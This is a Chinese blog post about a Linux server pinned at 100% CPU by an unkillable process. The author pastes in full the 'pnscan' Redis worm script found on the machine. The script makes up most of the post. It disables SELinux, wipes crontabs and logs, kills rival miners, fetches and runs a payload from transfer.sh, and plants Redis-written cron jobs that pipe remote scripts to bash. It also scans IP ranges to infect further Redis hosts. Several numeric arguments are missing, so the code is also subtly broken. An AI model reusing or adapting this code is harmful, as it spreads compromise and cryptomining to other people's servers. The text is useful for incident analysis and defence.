1: top 查看

>top -c

此时 我们使用kill -9 15003, 杀掉这个进程短暂的CPU降低几秒, 然后死灰复燃了, 又一个进程占了CPU 99%

2: 查看15003 进程状态,

> cat /proc/15003/status

Pid  :当前进程ID

PPid:当前进程的父进程  此时执行2次杀进程

kill - 

kill -

如果还是不行,本博主也不知道,重启服务器...

第二天发现一个问题redis 出现了Backup 3个key,存了一个url  https://transfer.sh/W5hJO/tmp.p9ArkdNk6P

打开连接,下载了tmp.p9ArkNK6p文件, 使用Notepad++打开, 发现最新型的pnscan病毒

sleep

find . -maxdepth  -name ".mxff0" -type f -mmin + -delete

[ -f .mxff0 ] && exit

echo  > .mxff0

trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXIT

setenforce  >/dev/null

echo SELINUX=disabled > /etc/sysconfig/selinux >/dev/null

crontab -r >/dev/null

rm -rf /var/spool/cron >/dev/null

grep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.conf

rm -rf /tmp/* 2>/dev/null

rm -rf /var/tmp/* 2>/dev/null

rm -rf /etc/root.sh 2>/dev/null

sync && echo 3 > /proc/sys/vm/drop_caches

cat <<EOF> /etc/security/limits.conf

*         hard    nofile      100000

*         soft    nofile      100000

root      hard    nofile      100000

root      soft    nofile      100000

*         hard    nproc       100000

*         soft    nproc       100000

root      hard    nproc       100000

root      soft    nproc       100000

EOF

iptables -I INPUT 1 -p tcp --dport 6379 -j DROP

iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT

ps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; done

rm -rf /tmp/* 2>/dev/null

rm -rf /var/tmp/* 2>/dev/null

echo 0 > /var/spool/mail/root

echo 0 > /var/log/wtmp

echo 0 > /var/log/secure

echo 0 > /root/.bash_history

YUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"

DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"

if cat /etc/*release | grep -i CentOS; then

yum clean all

yum install -y -q epel-release

yum install -y -q $YUM_PACKAGE_NAME

elif cat /etc/*release | grep -qi Red; then

yum clean all

yum install -y -q epel-release

yum install -y -q $YUM_PACKAGE_NAME

elif cat /etc/*release | grep -qi Fedora; then

yum clean all

yum install -y -q epel-release

yum install -y -q $YUM_PACKAGE_NAME

elif cat /etc/*release | grep -qi Ubuntu; then

export DEBIAN_FRONTEND=noninteractive

rm -rf /var/lib/apt/lists/*

apt-get update -q --fix-missing

for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

elif cat /etc/*release | grep -qi Debian; then

export DEBIAN_FRONTEND=noninteractive

rm -rf /var/lib/apt/lists/*

apt-get update --fix-missing

for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

elif cat /etc/*release | grep -qi Mint; then

export DEBIAN_FRONTEND=noninteractive

rm -rf /var/lib/apt/lists/*

apt-get update --fix-missing

for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

elif cat /etc/*release | grep -qi Knoppix; then

export DEBIAN_FRONTEND=noninteractive

rm -rf /var/lib/apt/lists/*

apt-get update --fix-missing

for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

else

exit 1

fi

sleep 1

if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then

curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12

sleep 1

[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112

fi

tname=$( mktemp )

OMURL=https://transfer.sh/HlrkQ/tmp.gIMakllioJ

curl -s $OMURL > $tname || wget -q -O $tname $OMURL

NMURL=$( curl -s --upload-file $tname https://transfer.sh )

mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg

[ -z "$NMURL" ] && NMURL=$OMURL

ncmd=$(basename $(mktemp))

sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmd

NSURL=$( curl -s --upload-file $ncmd https://transfer.sh )

echo 'flushall' > .dat

echo 'config set dir /var/spool/cron' >> .dat

echo 'config set dbfilename root' >> .dat

echo 'set Backup1 "\t\n*/ * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat

echo 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .dat

echo 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat

echo 'save' >> .dat

echo 'config set dir /var/spool/cron/crontabs' >> .dat

echo 'save' >> .dat

echo 'exit' >> .dat

pnx=pnscan

[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan

[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan

for x in $( seq   | sort -R ); do

for y in $( seq   | sort -R ); do

$pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/  > .r.$x.$y.o

awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l

while read -r h p; do

cat .dat | redis-cli -h $h -p $p --raw &

done < .r.$x.$y.l

done

done

echo  > /var/spool/mail/root >/dev/null

echo  > /var/log/wtmp >/dev/null

echo  > /var/log/secure >/dev/null

echo  > /root/.bash_history >/dev/null

exit

Linux CPU 100%, kill -9 杀不掉进程的更多相关文章

  1. Linux---使用kill杀不掉进程解决方案

    今天打开Linux虚拟机,然后使用jps命令查看,莫名奇妙多了一个1889进程 然后使用kill杀掉后,再运行jps还是存在此进程.于是乎开始大量百度,最终找到了解决方案. 说的很清楚了,杀不掉的原因 ...

  2. PostgreSQL 不要使用kill -9 杀 Postgresq 用户进程

    转载:http://francs3.blog.163.com/blog/static/4057672720109854858308/ Postgresql 8.3.3 今天应用反映数据库很慢,有些SQ ...

  3. linux cpu 100% 脚本

    for i in `seq 1 $(cat /proc/cpuinfo |grep "physical id" |wc -l)`; do dd if=/dev/zero of=/d ...

  4. Linux系统cpu 100%修复案例

    Linux系统cpu 100%修复案例 ​阿里云技术支持团队:完颜镇江 案例背景: Linux主机连续三天CPU% 处理思路: 1.  登录服务器查看/var/log/messages+/var/lo ...

  5. ora-00031:session marked for kill处理oracle中杀不掉的锁

    http://www.cnblogs.com/songdavid/articles/2223869.html 一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定 ...

  6. 【转】ora-00031:session marked for kill处理oracle中杀不掉的锁

    一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长时间不释放,有时实在没办法,只好重启数据库.现在提供一种方法解决这种问题,那就是在ORACLE中杀不 ...

  7. ORA-00031: session marked for kill 处理Oracle中杀不掉的锁

    一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长时间不释放,有时实在没办法,只好重启数据库.现在提供一种方法解决这种问题,那就是在ORACLE中杀不 ...

  8. session marked for kill处理oracle中杀不掉的锁

    ora-00031:session marked for kill处理oracle中杀不掉的锁   一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长 ...

  9. 如何查找僵尸进程并Kill之,杀不掉的要查看父进程并杀之

    转自:如何查找僵尸进程并Kill之,杀不掉的要查看父进程并杀之 用ps和grep命令寻找僵尸进程#ps -A -ostat,ppid,pid,cmd | grep -e '^[Zz]'命令注解:-A ...

随机推荐

  1. windows下的IO模型之事件选择(WSAEventSelect)模型

    异步选择模型类似的是,它也允许应用程序在一个或多个套接字上,接收以事件为基础的网络事件通知.对于异步选择模型采用的网络事件来说,它们均可原封不动地移植到事件选择模型.事件选择模型和异步选择模型最主要的 ...

  2. 解决PCI Geomatica 无法卸载的问题

    之前安装过PCI Geomatica 2016,非正常卸载,应该有一定残留,但我已经尽可能将注册表中包含PCI.Geomatica.Geomatics等关键字的条目删除干净了. 在重新安装新版本201 ...

  3. Beta阶段第2周/共2周 Scrum立会报告+燃尽图 11

    作业要求[https://edu.cnblogs.com/campus/nenu/2018fall/homework/2411] 版本控制:https://git.coding.net/liuyy08 ...

  4. vue.js 源代码学习笔记 ----- helpers.js

    /* @flow */ import { parseFilters } from './parser/filter-parser' export function baseWarn (msg: str ...

  5. PHPExcel解决内存占用过大问题-设置单元格对象缓存

    PHPExcel解决内存占用过大问题-设置单元格对象缓存 PHPExcel是一个很强大的处理Excel的PHP开源类,但是很大的一个问题就是它占用内存太大,从1.7.3开始,它支持设置cell的缓存方 ...

  6. (转)亿级Web系统搭建——单机到分布式集群

    当一个Web系统从日访问量10万逐步增长到1000万,甚至超过1亿的过程中,Web系统承受的压力会越来越大,在这个过程中,我们会遇到很多的问题.为了解决这些性能压力带来问题,我们需要在Web系统架构层 ...

  7. CS231n课程笔记翻译7:神经网络笔记 part2

    译者注:本文智能单元首发,译自斯坦福CS231n课程笔记Neural Nets notes 2,课程教师Andrej Karpathy授权翻译.本篇教程由杜客翻译完成,堃堃进行校对修改.译文含公式和代 ...

  8. ElasticSearch(二):windows下ElasticSearch6.3.2插件Head的安装

    前言 上一篇我们记录了如何安装ElasticSearch,这一篇我们来记录下如何安装Head插件 正文 方法总计有三种,但是安装ElasticSearch6.x的时候,只有一种完成了. 第一种:直接使 ...

  9. CH1812 生日礼物

    题意 描述 ftiasch 18岁生日的时候,lqp18_31给她看了一个神奇的序列 A1, A2, ..., AN. 她被允许选择不超过 M 个连续的部分作为自己的生日礼物.ftiasch想要知道选 ...

  10. hasura graphql 引擎基本试用

    hasura 使用一个基于pg数据库的graphql引擎,他的设计比postgrpahql 有好多方便的地方,同时使用也比较简单 安装 docker && docker-compose ...